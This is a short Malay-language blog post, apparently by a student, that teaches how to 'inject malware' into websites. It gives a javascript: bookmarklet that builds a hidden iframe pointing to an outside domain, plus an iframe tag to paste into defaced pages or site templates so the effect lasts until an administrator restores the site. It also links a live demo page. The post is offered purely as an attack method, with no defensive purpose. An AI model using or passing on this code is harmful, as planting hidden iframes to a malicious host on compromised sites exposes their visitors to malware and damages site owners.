Assalamualaikum dan salam sejahtera.Malam-malam buta ni aku tak dapat tidur la plak sedangkan esok sekolah.huhu...
OK entry ni aku nak share dengan korang satu teknik nak inject malware ke website orang.Apa fungsi? Ini akan menyebabkan bila orang buka website tu akan keluar alert MALWARE seperti dibawah :
Ada dua cara iaitu :
1. Javascript.Berkesan terhadap mana2 website sekalipun.tetapi tidak kekal.
2. Inject iframe site malware kedalam DEFACE atau Template website.Yang ini kekal selagi admin site tak recover :P
Baiklah jom mula!
1. Javascript (Credit to NoEntry)
Mula2 korang kena copy code javascript di bawah :
javascript:if (document.getElementsByTagName('body')[0]) { iframer(); }else { document.write("");}function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src', ' http://38zu.cn/ '); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f);}
Kemudian paste di address bar dan tekan ENTER! BOom! Keluar alert malware ^_^
Berkesan di mana2 website sekali pun.
note : bagi pengguna chrome jangan lupa tambah javascript: di hadapan code selepas paste.
2. Inject Code Ke Deface/Template
Baiklah ini pun senang je.Mula-mula copy code dibawah :
<iframe src="http://38zu.cn"/>
Kemudian paste la ke dalam HTML atau Template website!!!
Live Demo : http://www.saporidimaggio.com/malware.html
Baiklah sampai sini saja untuk kali ini.Mata aku pun dah berat.Assalamualaikum~
No comments:
Post a Comment